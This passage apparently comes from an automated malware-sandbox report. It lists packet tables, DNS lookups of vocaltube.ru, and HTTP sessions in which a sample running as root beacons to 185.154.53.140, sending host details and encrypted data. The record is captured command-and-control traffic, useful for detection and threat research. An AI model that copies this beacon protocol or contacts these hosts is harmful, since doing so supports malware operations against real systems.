Nov 29, 2023 18:00:30.371673107 CET	51192	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.374313116 CET	52194	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.374335051 CET	443	52194	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.380609989 CET	443	52192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.380676985 CET	52192	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.380695105 CET	443	52192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.380706072 CET	443	52192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.380763054 CET	52192	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.383841038 CET	52192	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.383860111 CET	443	52192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.717139959 CET	80	51190	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.717806101 CET	51190	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.732667923 CET	80	51192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:30.732713938 CET	51190	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.733254910 CET	51192	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.771353006 CET	51192	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.786998034 CET	51190	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:30.803013086 CET	51192	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:31.089004993 CET	80	51190	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:31.089024067 CET	80	51190	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:31.089155912 CET	51190	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:31.097130060 CET	51190	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:31.132487059 CET	80	51192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:31.132596016 CET	80	51192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:31.132646084 CET	51192	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:31.142932892 CET	80	51190	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:31.143023014 CET	51190	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:31.149688005 CET	51192	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:31.164151907 CET	80	51192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:31.164222956 CET	51192	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:31.226550102 CET	52204	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:31.226677895 CET	443	52204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:31.226810932 CET	52204	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:31.227072001 CET	52202	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:31.227148056 CET	443	52202	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:31.228375912 CET	52202	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:31.237934113 CET	52204	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:31.237968922 CET	443	52204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:31.239309072 CET	52202	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:31.239326954 CET	443	52202	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:31.453437090 CET	80	51190	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:31.510782003 CET	80	51192	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.322993040 CET	443	52204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.323467970 CET	52204	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.326220989 CET	52204	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.326246977 CET	443	52204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.327399015 CET	52204	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.327413082 CET	443	52204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.331545115 CET	443	52204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.331614971 CET	52204	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.335189104 CET	52204	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.335556984 CET	443	52204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.335640907 CET	52204	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.335766077 CET	443	52204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.335818052 CET	52204	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.336080074 CET	443	52202	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.336127996 CET	52202	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.338567972 CET	52204	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.339179039 CET	52202	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.339184999 CET	443	52202	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.340881109 CET	52202	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.340884924 CET	443	52202	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.342349052 CET	443	52202	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.342397928 CET	52202	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.346654892 CET	52202	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.346733093 CET	443	52202	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.346786976 CET	52202	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.346791029 CET	443	52202	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.346823931 CET	52202	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.348694086 CET	52202	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.381258965 CET	443	52204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.389292955 CET	443	52202	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.693715096 CET	443	52204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.693911076 CET	443	52204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.694128990 CET	52204	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.709803104 CET	443	52202	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.709846973 CET	52202	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.709861040 CET	443	52202	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.709893942 CET	52202	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.709903955 CET	443	52202	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.711981058 CET	52204	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.712061882 CET	443	52204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:32.712794065 CET	51198	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.713119030 CET	52202	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:32.713135004 CET	443	52202	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:33.076740026 CET	80	51198	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:33.076984882 CET	51198	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:33.079065084 CET	51198	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:33.443747044 CET	80	51198	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:33.443870068 CET	80	51198	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:33.443901062 CET	80	51198	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:33.444087982 CET	51198	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:33.445409060 CET	51198	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:33.542900085 CET	52208	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:33.542988062 CET	443	52208	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:33.543056965 CET	52208	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:33.544389009 CET	52208	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:33.544420958 CET	443	52208	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:33.809137106 CET	80	51198	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:34.638588905 CET	443	52208	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:34.638942003 CET	52208	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:34.640566111 CET	52208	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:34.640588045 CET	443	52208	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:34.642119884 CET	52208	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:34.642138958 CET	443	52208	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:34.643733978 CET	443	52208	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:34.643811941 CET	52208	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:34.648399115 CET	52208	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:34.648530006 CET	443	52208	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:34.648571014 CET	52208	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:34.648583889 CET	443	52208	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:34.648619890 CET	52208	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:34.650907040 CET	52208	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:34.697264910 CET	443	52208	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:35.011297941 CET	443	52208	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:35.011475086 CET	443	52208	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:35.011487007 CET	52208	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:35.014795065 CET	45028	80	192.168.2.23	212.22.77.79
Nov 29, 2023 18:00:35.015073061 CET	52208	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:35.015139103 CET	443	52208	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:35.985771894 CET	51204	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:36.029416084 CET	45028	80	192.168.2.23	212.22.77.79
Nov 29, 2023 18:00:36.345650911 CET	80	51204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:36.345799923 CET	51204	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:36.347754002 CET	51204	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:36.349129915 CET	51204	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:36.707207918 CET	80	51204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:36.707231998 CET	80	51204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:36.707359076 CET	51204	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:36.708435059 CET	80	51204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:36.709487915 CET	51204	80	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:36.806835890 CET	52214	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:36.806883097 CET	443	52214	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:36.806962967 CET	52214	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:36.808967113 CET	52214	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:36.808990002 CET	443	52214	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:37.068885088 CET	80	51204	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:37.893503904 CET	443	52214	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:37.893779039 CET	52214	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:37.895829916 CET	52214	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:37.895857096 CET	443	52214	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:37.897886992 CET	52214	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:37.897902966 CET	443	52214	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:37.899374008 CET	443	52214	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:37.899461031 CET	52214	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:37.906920910 CET	52214	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:37.907104015 CET	443	52214	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:37.907166958 CET	52214	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:37.907185078 CET	443	52214	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:37.907237053 CET	52214	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:37.908957958 CET	52214	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:37.953278065 CET	443	52214	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:38.045043945 CET	45028	80	192.168.2.23	212.22.77.79
Nov 29, 2023 18:00:38.266189098 CET	443	52214	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:38.266377926 CET	443	52214	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:38.266379118 CET	52214	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:38.269850016 CET	52214	443	192.168.2.23	185.154.53.140
Nov 29, 2023 18:00:38.269887924 CET	443	52214	185.154.53.140	192.168.2.23
Nov 29, 2023 18:00:42.108606100 CET	45028	80	192.168.2.23	212.22.77.79
Nov 29, 2023 18:00:50.299640894 CET	45028	80	192.168.2.23	212.22.77.79

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2023 17:59:58.802834034 CET	55441	53	192.168.2.23	8.8.8.8
Nov 29, 2023 17:59:58.803575993 CET	44365	53	192.168.2.23	8.8.8.8
Nov 29, 2023 17:59:58.911514044 CET	53	44365	8.8.8.8	192.168.2.23
Nov 29, 2023 17:59:59.031613111 CET	53	55441	8.8.8.8	192.168.2.23
Nov 29, 2023 18:00:02.629540920 CET	38371	53	192.168.2.23	8.8.8.8
Nov 29, 2023 18:00:02.850317001 CET	53	38371	8.8.8.8	192.168.2.23
Nov 29, 2023 18:00:05.046999931 CET	55770	53	192.168.2.23	8.8.8.8
Nov 29, 2023 18:00:05.140968084 CET	53	55770	8.8.8.8	192.168.2.23
Nov 29, 2023 18:00:07.353355885 CET	50676	53	192.168.2.23	8.8.8.8
Nov 29, 2023 18:00:07.459322929 CET	53	50676	8.8.8.8	192.168.2.23
Nov 29, 2023 18:00:09.661288977 CET	33092	53	192.168.2.23	8.8.8.8
Nov 29, 2023 18:00:09.756412029 CET	53	33092	8.8.8.8	192.168.2.23
Nov 29, 2023 18:00:11.950664043 CET	41486	53	192.168.2.23	8.8.8.8
Nov 29, 2023 18:00:12.200902939 CET	53	41486	8.8.8.8	192.168.2.23
Nov 29, 2023 18:00:14.392560959 CET	38172	53	192.168.2.23	8.8.8.8
Nov 29, 2023 18:00:14.485933065 CET	53	38172	8.8.8.8	192.168.2.23
Nov 29, 2023 18:00:28.778932095 CET	40298	53	192.168.2.23	8.8.8.8
Nov 29, 2023 18:00:28.872431993 CET	53	40298	8.8.8.8	192.168.2.23
Nov 29, 2023 18:00:31.102813959 CET	51075	53	192.168.2.23	8.8.8.8
Nov 29, 2023 18:00:31.196296930 CET	53	51075	8.8.8.8	192.168.2.23
Nov 29, 2023 18:00:33.447529078 CET	37869	53	192.168.2.23	8.8.8.8
Nov 29, 2023 18:00:33.540978909 CET	53	37869	8.8.8.8	192.168.2.23
Nov 29, 2023 18:00:36.711891890 CET	42815	53	192.168.2.23	8.8.8.8
Nov 29, 2023 18:00:36.805310011 CET	53	42815	8.8.8.8	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2023 17:59:58.802834034 CET	192.168.2.23	8.8.8.8	0x36c	Standard query (0)	vocaltube.ru	28	IN (0x0001)	false
Nov 29, 2023 17:59:58.803575993 CET	192.168.2.23	8.8.8.8	0xd2e1	Standard query (0)	vocaltube.ru	A (IP address)	IN (0x0001)	false
Nov 29, 2023 18:00:02.629540920 CET	192.168.2.23	8.8.8.8	0x3b06	Standard query (0)	vocaltube.ru	28	IN (0x0001)	false
Nov 29, 2023 18:00:05.046999931 CET	192.168.2.23	8.8.8.8	0x8884	Standard query (0)	vocaltube.ru	28	IN (0x0001)	false
Nov 29, 2023 18:00:07.353355885 CET	192.168.2.23	8.8.8.8	0xc5a	Standard query (0)	vocaltube.ru	28	IN (0x0001)	false
Nov 29, 2023 18:00:09.661288977 CET	192.168.2.23	8.8.8.8	0x76c0	Standard query (0)	vocaltube.ru	28	IN (0x0001)	false
Nov 29, 2023 18:00:11.950664043 CET	192.168.2.23	8.8.8.8	0x74bf	Standard query (0)	vocaltube.ru	28	IN (0x0001)	false
Nov 29, 2023 18:00:14.392560959 CET	192.168.2.23	8.8.8.8	0xb7e6	Standard query (0)	vocaltube.ru	28	IN (0x0001)	false
Nov 29, 2023 18:00:28.778932095 CET	192.168.2.23	8.8.8.8	0xef5a	Standard query (0)	vocaltube.ru	28	IN (0x0001)	false
Nov 29, 2023 18:00:31.102813959 CET	192.168.2.23	8.8.8.8	0x2825	Standard query (0)	vocaltube.ru	28	IN (0x0001)	false
Nov 29, 2023 18:00:33.447529078 CET	192.168.2.23	8.8.8.8	0xf204	Standard query (0)	vocaltube.ru	28	IN (0x0001)	false
Nov 29, 2023 18:00:36.711891890 CET	192.168.2.23	8.8.8.8	0x224	Standard query (0)	vocaltube.ru	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 29, 2023 17:59:58.911514044 CET	8.8.8.8	192.168.2.23	0xd2e1	No error (0)	vocaltube.ru		185.154.53.140	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

185.154.53.140

vocaltube.ru

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.23	51150	185.154.53.140	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2023 17:59:58.397598028 CET	447	OUT	GET /mg HTTP/1.1 Host: 185.154.53.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Connection: close Arch: arm64 Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
Nov 29, 2023 17:59:58.758219004 CET	539	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 29 Nov 2023 16:59:58 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://vocaltube.ru/mg Strict-Transport-Security: max-age=31536000 Content-Security-Policy: img-src https: data: blob:; upgrade-insecure-requests Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.23	51154	185.154.53.140	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2023 18:00:02.260802031 CET	503	OUT	POST /mu HTTP/1.1 Host: 185.154.53.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Connection: close Content-Length: 0 Arch: arm64 Cores: 2 Id: AVlUGnSVaInqKQGUMEBcdUNwlsHekB Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
Nov 29, 2023 18:00:02.624886036 CET	539	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 29 Nov 2023 17:00:02 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://vocaltube.ru/mu Strict-Transport-Security: max-age=31536000 Content-Security-Policy: img-src https: data: blob:; upgrade-insecure-requests Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.23	51158	185.154.53.140	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2023 18:00:04.674506903 CET	507	OUT	POST /l HTTP/1.1 Host: 185.154.53.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Connection: close Content-Length: 58 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
Nov 29, 2023 18:00:04.677401066 CET	124	OUT	Data Raw: 4f 37 54 58 8d 16 84 29 bb 1e da f6 25 09 b4 11 bb 78 18 86 0e b3 a1 b5 a1 ec 80 1d cb 53 b3 0d 42 8f 34 8a c4 d6 4f 43 e7 3d 87 a2 06 b6 ac e5 ff f4 2c 27 13 e8 71 32 e3 a8 Data Ascii: O7TX)%xSB4OC=,'q2
Nov 29, 2023 18:00:05.037219048 CET	538	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 29 Nov 2023 17:00:04 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://vocaltube.ru/l Strict-Transport-Security: max-age=31536000 Content-Security-Policy: img-src https: data: blob:; upgrade-insecure-requests Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.23	51162	185.154.53.140	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2023 18:00:06.985572100 CET	507	OUT	POST /l HTTP/1.1 Host: 185.154.53.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Connection: close Content-Length: 56 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
Nov 29, 2023 18:00:06.986979008 CET	122	OUT	Data Raw: 54 07 40 46 84 16 c5 32 a2 4e 83 f8 33 05 a4 1c f6 7b 17 92 09 f2 b2 a5 a7 cb c3 49 cd 52 88 04 62 99 6b 9d 97 d1 1c 0d f5 78 9d aa 13 b7 ef ea e4 e9 63 2f 5c f8 6d 24 Data Ascii: T@F2N3{IRbkxc/\m$
Nov 29, 2023 18:00:07.348088980 CET	538	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 29 Nov 2023 17:00:07 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://vocaltube.ru/l Strict-Transport-Security: max-age=31536000 Content-Security-Policy: img-src https: data: blob:; upgrade-insecure-requests Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
4	192.168.2.23	51166	185.154.53.140	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2023 18:00:09.294225931 CET	503	OUT	POST /mu HTTP/1.1 Host: 185.154.53.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Connection: close Content-Length: 0 Arch: arm64 Cores: 2 Id: kEYItBUgmVxsTilBfeqnkdZqlVWoUa Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
Nov 29, 2023 18:00:09.656766891 CET	539	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 29 Nov 2023 17:00:09 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://vocaltube.ru/mu Strict-Transport-Security: max-age=31536000 Content-Security-Policy: img-src https: data: blob:; upgrade-insecure-requests Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
5	192.168.2.23	51170	185.154.53.140	80

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2023 18:00:11.590604067 CET	507	OUT	POST /l HTTP/1.1 Host: 185.154.53.140 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Connection: close Content-Length: 58 Arch: arm64 Content-Type: application/octet-stream Cores: 2 Mem: 2992 Os: linux Osname: ubuntu Osversion: 20.04 Root: true Started: 1701277137 Uuid: 8943ba3c-3f37-46d8-69ce-6633309867a5 Version: 39 Accept-Encoding: gzip
